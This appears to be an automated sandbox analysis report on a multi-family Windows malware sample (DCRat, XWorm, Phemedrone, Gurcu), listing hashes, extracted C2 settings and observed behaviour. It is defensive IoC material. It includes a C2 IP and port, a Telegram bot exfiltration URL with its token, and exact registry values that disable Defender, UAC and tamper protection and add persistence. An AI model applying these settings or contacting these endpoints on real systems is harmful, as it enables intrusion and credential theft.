dcrat | 7eb139dfd20e9e10a245d1dee02efd7d109bf84578dc200af354fed8ad4752dc

Analysis

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20250207-en
resource tags

arch:x64arch:x86image:win10v2004-20250207-enlocale:en-usos:windows10-2004-x64system
submitted
07/02/2025, 23:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

TestLoader.exe
Size

181KB
MD5

3a58bbafb76707b770bfd32b71dec1ea
SHA1

782127a6ee74082671963b26dcfb95ae0cc3b218
SHA256

7eb139dfd20e9e10a245d1dee02efd7d109bf84578dc200af354fed8ad4752dc
SHA512

ea168fa4318dcea0077462f7cb4c4907e7857d17f4b01b76c96633da1a89ea05b65f4e87cf18b7c2c88eb2801a769a27cbabab3c531b6aedbcaac322ab9c401a
SSDEEP

3072:wHfBELxl/i6/hkRZltsKuNCjQutKbtVK6bpfSJYacv:w5ELxla6GbWUq8Y

Score

10^/10

dcrat gurcu phemedrone xworm credential_access defense_evasion discovery evasion execution infostealer persistence rat spyware stealer trojan

Malware Config

Extracted

Family

xworm

138.124.58.209:5555

Attributes

Install_directory
%ProgramData%
install_file
sscore.exe

Extracted

Family

phemedrone

https://api.telegram.org/bot7944456076:AAGpjhHLrlnhpd2D6D-Z8494fRloZ5j7GY0/sendDocument

Extracted

Family

gurcu

https://api.telegram.org/bot7944456076:AAGpjhHLrlnhpd2D6D-Z8494fRloZ5j7GY0/sendDocumen

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
Dcrat family
dcrat

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral2/files/0x0011000000023ceb-564.dat	family_xworm
behavioral2/memory/4344-578-0x0000000000CD0000-0x0000000000CEC000-memory.dmp	family_xworm

Gurcu family
gurcu
Gurcu, WhiteSnake
Gurcu aka WhiteSnake is a malware stealer written in C#.
stealer gurcu

Modifies Windows Defender Real-time Protection settings 3 TTPs 5 IoCs

defense_evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	TestLoader.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	TestLoader.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	TestLoader.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	TestLoader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	TestLoader.exe

Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0"	TestLoader.exe

Phemedrone
An information and wallet stealer written in C#.
stealer phemedrone
Phemedrone family
phemedrone

Process spawned unexpected child process 48 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4972	220	schtasks.exe	200
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4856	220	schtasks.exe	200
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4768	220	schtasks.exe	200
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2392	220	schtasks.exe	200
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3252	220	schtasks.exe	200
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	224	220	schtasks.exe	200
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4408	220	schtasks.exe	200
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3224	220	schtasks.exe	200
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5084	220	schtasks.exe	200
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1940	220	schtasks.exe	200
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4384	220	schtasks.exe	200
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3472	220	schtasks.exe	200
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4228	220	schtasks.exe	200
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2500	220	schtasks.exe	200
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4612	220	schtasks.exe	200
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	628	220	schtasks.exe	200
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4776	220	schtasks.exe	200
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5048	220	schtasks.exe	200
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3108	220	schtasks.exe	200
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4968	220	schtasks.exe	200
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4696	220	schtasks.exe	200
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5060	220	schtasks.exe	200
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4356	220	schtasks.exe	200
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4184	220	schtasks.exe	200
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	676	220	schtasks.exe	200
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4436	220	schtasks.exe	200
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3260	220	schtasks.exe	200
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4124	220	schtasks.exe	200
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2220	220	schtasks.exe	200
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1884	220	schtasks.exe	200
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	768	220	schtasks.exe	200
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3764	220	schtasks.exe	200
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2328	220	schtasks.exe	200
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2544	220	schtasks.exe	200
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	8	220	schtasks.exe	200
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1660	220	schtasks.exe	200
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4664	220	schtasks.exe	200
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	232	220	schtasks.exe	200
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3696	220	schtasks.exe	200
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	804	220	schtasks.exe	200
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2456	220	schtasks.exe	200
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2824	220	schtasks.exe	200
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	976	220	schtasks.exe	200
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1032	220	schtasks.exe	200
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3396	220	schtasks.exe	200
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3600	220	schtasks.exe	200
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1312	220	schtasks.exe	200
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2492	220	schtasks.exe	200

UAC bypass 3 TTPs 6 IoCs

defense_evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	System.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	System.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	System.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	SteamWebClient.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	SteamWebClient.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	SteamWebClient.exe

Windows security bypass 2 TTPs 7 IoCs

defense_evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0"	TestLoader.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files = "0"	TestLoader.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86) = "0"	TestLoader.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users = "0"	TestLoader.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\SkillProtect = "0"	TestLoader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	TestLoader.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "0"	TestLoader.exe

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

DCRat payload 3 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

resource	yara_rule
behavioral2/files/0x000a000000023cf2-585.dat	dcrat
behavioral2/files/0x000b000000023cf9-611.dat	dcrat
behavioral2/memory/3020-613-0x0000000000A80000-0x0000000000B88000-memory.dmp	dcrat

Command and Scripting Interpreter: PowerShell 1 TTPs 64 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2028	powershell.exe
5096	powershell.exe
4624	powershell.exe
1376	powershell.exe
4112	powershell.exe
2404	powershell.exe
4436	powershell.exe
1692	powershell.exe
2960	powershell.exe
1300	powershell.exe
2676	powershell.exe
4956	powershell.exe
3308	powershell.exe
2520	powershell.exe
3728	powershell.exe
4632	powershell.exe
1104	powershell.exe
2680	powershell.exe
1032	powershell.exe
4940	powershell.exe
3336	powershell.exe
752	powershell.exe
1872	powershell.exe
1704	powershell.exe
4016	powershell.exe
3796	powershell.exe
3944	powershell.exe
1620	powershell.exe
1296	powershell.exe
804	powershell.exe
3392	powershell.exe
1552	powershell.exe
3144	powershell.exe
4436	powershell.exe
804	powershell.exe
4620	powershell.exe
3644	powershell.exe
4104	powershell.exe
4116	powershell.exe
1732	powershell.exe
5084	powershell.exe
4280	powershell.exe
4032	powershell.exe
2852	powershell.exe
3260	powershell.exe
2444	powershell.exe
4156	powershell.exe
3016	powershell.exe
5056	powershell.exe
4336	powershell.exe
2444	powershell.exe
4632	powershell.exe
2852	powershell.exe
1104	powershell.exe
3260	powershell.exe
2680	powershell.exe
4116	powershell.exe
4156	powershell.exe
1060	powershell.exe
3908	powershell.exe
4472	powershell.exe
2028	powershell.exe
2852	powershell.exe
4436	powershell.exe

Downloads MZ/PE file 3 IoCs

flow	pid	Process
37	5024	Process not Found
68	8	TestLoader.exe
82	8	TestLoader.exe

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3311063739-2594902809-44604183-1000\Control Panel\International\Geo\Nation	sihost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3311063739-2594902809-44604183-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3311063739-2594902809-44604183-1000\Control Panel\International\Geo\Nation	SteamWebClient.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3311063739-2594902809-44604183-1000\Control Panel\International\Geo\Nation	System.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3311063739-2594902809-44604183-1000\Control Panel\International\Geo\Nation	TestLoader.exe

Executes dropped EXE 6 IoCs

pid	Process
4344	RarExtPackage.exe
1984	CustomJavaSC.exe
2096	sihost.exe
3124	SteamWebHelper.exe
3020	SteamWebClient.exe
2788	System.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001

Windows security modification 2 TTPs 20 IoCs

defense_evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection	TestLoader.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	TestLoader.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "0"	TestLoader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard	TestLoader.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtectionSource = "0"	TestLoader.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\SkillProtect = "0"	TestLoader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\Controlled Folder Access\AllowedApplications	TestLoader.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\Controlled Folder Access\AllowedApplications\C:\Windows\System32\cmd.exe = "0"	TestLoader.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\Controlled Folder Access\AllowedApplications\C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe = "0"	TestLoader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features	TestLoader.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0"	TestLoader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	TestLoader.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0"	TestLoader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\Controlled Folder Access	TestLoader.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users = "0"	TestLoader.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	TestLoader.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	TestLoader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions	TestLoader.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files = "0"	TestLoader.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86) = "0"	TestLoader.exe

Adds Run key to start application 2 TTPs 12 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sihost_02 = "C:\\Program Files\\RUXIM\\sihost.exe"	TestLoader.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\sihost_02 = "C:\\Program Files\\RUXIM\\sihost.exe"	TestLoader.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3311063739-2594902809-44604183-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sihost_02 = "C:\\Program Files\\RUXIM\\sihost.exe"	TestLoader.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss_41 = "C:\\Program Files\\WinRar\\RarExtPackage.exe"	TestLoader.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\smss_41 = "C:\\Program Files\\WinRar\\RarExtPackage.exe"	TestLoader.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\services_25 = "C:\\Program Files\\Java\\CustomJavaSC.exe"	TestLoader.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\services_25 = "C:\\Program Files\\Java\\CustomJavaSC.exe"	TestLoader.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\services_25 = "C:\\Program Files\\Java\\CustomJavaSC.exe"	TestLoader.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3311063739-2594902809-44604183-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\services_25 = "C:\\Program Files\\Java\\CustomJavaSC.exe"	TestLoader.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\sihost_02 = "C:\\Program Files\\RUXIM\\sihost.exe"	TestLoader.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\smss_41 = "C:\\Program Files\\WinRar\\RarExtPackage.exe"	TestLoader.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3311063739-2594902809-44604183-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss_41 = "C:\\Program Files\\WinRar\\RarExtPackage.exe"	TestLoader.exe

Checks whether UAC is enabled 1 TTPs 4 IoCs

defense_evasion trojan

System Information Discovery

T1082

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	SteamWebClient.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	System.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	System.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	SteamWebClient.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
7	discord.com
1	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
86	ip-api.com

Modifies WinLogon 2 TTPs 3 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\sihost_02 = "C:\\Program Files\\RUXIM\\sihost.exe"	TestLoader.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\smss_41 = "C:\\Program Files\\WinRar\\RarExtPackage.exe"	TestLoader.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\services_25 = "C:\\Program Files\\Java\\CustomJavaSC.exe"	TestLoader.exe

Drops file in Program Files directory 9 IoCs

description	ioc	Process
File created	C:\Program Files\Java\jre-1.8\lib\deploy\fontdrvhost.exe	SteamWebClient.exe
File created	C:\Program Files\Java\jre-1.8\lib\deploy\5b884080fd4f94	SteamWebClient.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\conhost.exe	SteamWebClient.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\088424020bedd6	SteamWebClient.exe
File created	C:\Program Files\WinRar\RarExtPackage.exe	TestLoader.exe
File created	C:\Program Files\RUXIM\sihost.exe	TestLoader.exe
File created	C:\Program Files\WinRar\9c3c2afd61905e	SteamWebClient.exe
File created	C:\Program Files\Java\CustomJavaSC.exe	TestLoader.exe
File created	C:\Program Files\WinRar\SteamWebHelper.exe	SteamWebClient.exe

Drops file in Windows directory 11 IoCs

description	ioc	Process
File created	C:\Windows\PLA\Rules\de-DE\conhost.exe	SteamWebClient.exe
File created	C:\Windows\bcastdvr\ee2ad38f3d4382	SteamWebClient.exe
File created	C:\Windows\Migration\WTR\services.exe	SteamWebClient.exe
File created	C:\Windows\Migration\WTR\c5b4cb5e9653cc	SteamWebClient.exe
File created	C:\Windows\Offline Web Pages\SteamWebHelper.exe	SteamWebClient.exe
File created	C:\Windows\Offline Web Pages\9c3c2afd61905e	SteamWebClient.exe
File created	C:\Windows\Offline Web Pages\ee2ad38f3d4382	SteamWebClient.exe
File created	C:\Windows\schemas\EAPMethods\StartMenuExperienceHost.exe	SteamWebClient.exe
File created	C:\Windows\PLA\Rules\de-DE\088424020bedd6	SteamWebClient.exe
File created	C:\Windows\bcastdvr\Registry.exe	SteamWebClient.exe
File created	C:\Windows\Offline Web Pages\Registry.exe	SteamWebClient.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MicrosoftEdgeUpdate.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4004	MicrosoftEdgeUpdate.exe

Modifies registry class 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3311063739-2594902809-44604183-1000_Classes\Local Settings	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-3311063739-2594902809-44604183-1000_Classes\Local Settings	SteamWebClient.exe
Key created	\REGISTRY\USER\S-1-5-21-3311063739-2594902809-44604183-1000_Classes\Local Settings	System.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 48 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
5084	schtasks.exe
4612	schtasks.exe
4776	schtasks.exe
3696	schtasks.exe
2456	schtasks.exe
2824	schtasks.exe
1312	schtasks.exe
3252	schtasks.exe
3260	schtasks.exe
8	schtasks.exe
1660	schtasks.exe
232	schtasks.exe
976	schtasks.exe
3396	schtasks.exe
3600	schtasks.exe
3224	schtasks.exe
1940	schtasks.exe
5060	schtasks.exe
4184	schtasks.exe
2220	schtasks.exe
1884	schtasks.exe
2544	schtasks.exe
2392	schtasks.exe
4768	schtasks.exe
3472	schtasks.exe
4696	schtasks.exe
804	schtasks.exe
4972	schtasks.exe
2500	schtasks.exe
5048	schtasks.exe
4968	schtasks.exe
4436	schtasks.exe
3764	schtasks.exe
1032	schtasks.exe
4856	schtasks.exe
4408	schtasks.exe
4228	schtasks.exe
4124	schtasks.exe
768	schtasks.exe
2328	schtasks.exe
4664	schtasks.exe
224	schtasks.exe
628	schtasks.exe
3108	schtasks.exe
2492	schtasks.exe
4384	schtasks.exe
676	schtasks.exe
4356	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1692	powershell.exe
1692	powershell.exe
1296	powershell.exe
1296	powershell.exe
804	powershell.exe
804	powershell.exe
4632	powershell.exe
4632	powershell.exe
1104	powershell.exe
1104	powershell.exe
4112	powershell.exe
4112	powershell.exe
2028	powershell.exe
2028	powershell.exe
2852	powershell.exe
2852	powershell.exe
4940	powershell.exe
4940	powershell.exe
3260	powershell.exe
3260	powershell.exe
3392	powershell.exe
3392	powershell.exe
3336	powershell.exe
3336	powershell.exe
5096	powershell.exe
5096	powershell.exe
2444	powershell.exe
2444	powershell.exe
2960	powershell.exe
2960	powershell.exe
1300	powershell.exe
1300	powershell.exe
752	powershell.exe
752	powershell.exe
4620	powershell.exe
4620	powershell.exe
3644	powershell.exe
3644	powershell.exe
2676	powershell.exe
2676	powershell.exe
4956	powershell.exe
4956	powershell.exe
1552	powershell.exe
1552	powershell.exe
1872	powershell.exe
1872	powershell.exe
1704	powershell.exe
1704	powershell.exe
2404	powershell.exe
2404	powershell.exe
4624	powershell.exe
4624	powershell.exe
4436	powershell.exe
4436	powershell.exe
4104	powershell.exe
4104	powershell.exe
4116	powershell.exe
4116	powershell.exe
1732	powershell.exe
1732	powershell.exe
4156	powershell.exe
4156	powershell.exe
2680	powershell.exe
2680	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	8	TestLoader.exe
Token: SeDebugPrivilege	1692	powershell.exe
Token: SeDebugPrivilege	1296	powershell.exe
Token: SeDebugPrivilege	804	powershell.exe
Token: SeDebugPrivilege	4632	powershell.exe
Token: SeBackupPrivilege	8	TestLoader.exe
Token: SeRestorePrivilege	8	TestLoader.exe
Token: SeDebugPrivilege	1104	powershell.exe
Token: SeDebugPrivilege	4112	powershell.exe
Token: SeDebugPrivilege	2028	powershell.exe
Token: SeDebugPrivilege	2852	powershell.exe
Token: SeDebugPrivilege	4940	powershell.exe
Token: SeDebugPrivilege	3260	powershell.exe
Token: SeDebugPrivilege	3392	powershell.exe
Token: SeDebugPrivilege	3336	powershell.exe
Token: SeDebugPrivilege	5096	powershell.exe
Token: SeDebugPrivilege	2444	powershell.exe
Token: SeDebugPrivilege	2960	powershell.exe
Token: SeDebugPrivilege	1300	powershell.exe
Token: SeDebugPrivilege	752	powershell.exe
Token: SeDebugPrivilege	4620	powershell.exe
Token: SeDebugPrivilege	3644	powershell.exe
Token: SeDebugPrivilege	2676	powershell.exe
Token: SeDebugPrivilege	4956	powershell.exe
Token: SeDebugPrivilege	1552	powershell.exe
Token: SeDebugPrivilege	1872	powershell.exe
Token: SeDebugPrivilege	1704	powershell.exe
Token: SeDebugPrivilege	2404	powershell.exe
Token: SeDebugPrivilege	4624	powershell.exe
Token: SeDebugPrivilege	4436	powershell.exe
Token: SeDebugPrivilege	4104	powershell.exe
Token: SeDebugPrivilege	4116	powershell.exe
Token: SeDebugPrivilege	1732	powershell.exe
Token: SeDebugPrivilege	4156	powershell.exe
Token: SeDebugPrivilege	2680	powershell.exe
Token: SeDebugPrivilege	3144	powershell.exe
Token: SeDebugPrivilege	5084	powershell.exe
Token: SeDebugPrivilege	1032	powershell.exe
Token: SeDebugPrivilege	4436	powershell.exe
Token: SeDebugPrivilege	4016	powershell.exe
Token: SeDebugPrivilege	804	powershell.exe
Token: SeDebugPrivilege	4280	powershell.exe
Token: SeDebugPrivilege	3796	powershell.exe
Token: SeDebugPrivilege	4032	powershell.exe
Token: SeDebugPrivilege	3016	powershell.exe
Token: SeDebugPrivilege	3308	powershell.exe
Token: SeDebugPrivilege	3944	powershell.exe
Token: SeDebugPrivilege	1620	powershell.exe
Token: SeDebugPrivilege	1376	powershell.exe
Token: SeDebugPrivilege	2520	powershell.exe
Token: SeDebugPrivilege	3728	powershell.exe
Token: SeDebugPrivilege	4344	RarExtPackage.exe
Token: SeDebugPrivilege	3124	SteamWebHelper.exe
Token: SeDebugPrivilege	3020	SteamWebClient.exe
Token: SeDebugPrivilege	4472	powershell.exe
Token: SeDebugPrivilege	4632	powershell.exe
Token: SeDebugPrivilege	1060	powershell.exe
Token: SeDebugPrivilege	2380	powershell.exe
Token: SeDebugPrivilege	2444	powershell.exe
Token: SeDebugPrivilege	1956	powershell.exe
Token: SeDebugPrivilege	2852	powershell.exe
Token: SeDebugPrivilege	4832	powershell.exe
Token: SeDebugPrivilege	5056	powershell.exe
Token: SeDebugPrivilege	4336	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 8 wrote to memory of 1692	8	TestLoader.exe	88
PID 8 wrote to memory of 1692	8	TestLoader.exe	88
